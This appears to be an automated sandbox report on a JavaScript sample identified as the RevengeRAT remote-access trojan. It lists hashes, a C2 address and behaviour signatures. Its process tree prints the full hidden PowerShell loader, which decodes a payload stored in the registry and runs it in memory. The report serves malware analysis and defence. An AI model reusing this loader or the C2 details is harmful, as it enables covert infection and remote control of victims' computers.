Overview

overview

10

Static

static

1

862502255d...3f7.js

windows7-x64

10

862502255d...3f7.js

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-01-2025 03:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7.js

  • Size

    253KB

  • MD5

    453bc0d9d84305bd4811c8c0c8622db6

  • SHA1

    85553506f2dc5abcec56a06cb36f69c0b046efa4

  • SHA256

    862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7

  • SHA512

    af6ef42e885481ae3bc0939017c8eb328531ea50d7eb852bd7b5b744a70d202e57f09f2671ab1553c05d4c53181973896c44109e7eb19f7fb0d087f697632d87

  • SSDEEP

    6144:p8t+pgvJENiy2BMs+1WKKL7EVLy19uQTuol9nv2RWoaAImBeN1PXY1qm:p8kpgvJENZ2JJLm

Score
10/10
revengeratnyancatrevengeexecutiontrojan

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

13.49.66.229:333

Mutex

8a25aa6e78e44708a

Signatures

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

    trojanrevengerat
  • Revengerat family
    revengerat
  • Blocklisted process makes network request 31 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\862502255d9fd9eb8f658e23f3833e7cd211514cb9f9a6a2853ae9858d3843f7.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\' -name 'KeyName').KeyName;$_b=$_b.replace('~','30');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1808

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1808-4-0x000007FEF578E000-0x000007FEF578F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1808-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1808-6-0x0000000002910000-0x0000000002918000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1808-7-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1808-8-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1808-9-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1808-10-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1808-11-0x0000000002DF0000-0x0000000002DFA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1808-12-0x000007FEF578E000-0x000007FEF578F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1808-13-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1808-14-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1808-15-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

    Filesize

    9.6MB

    Download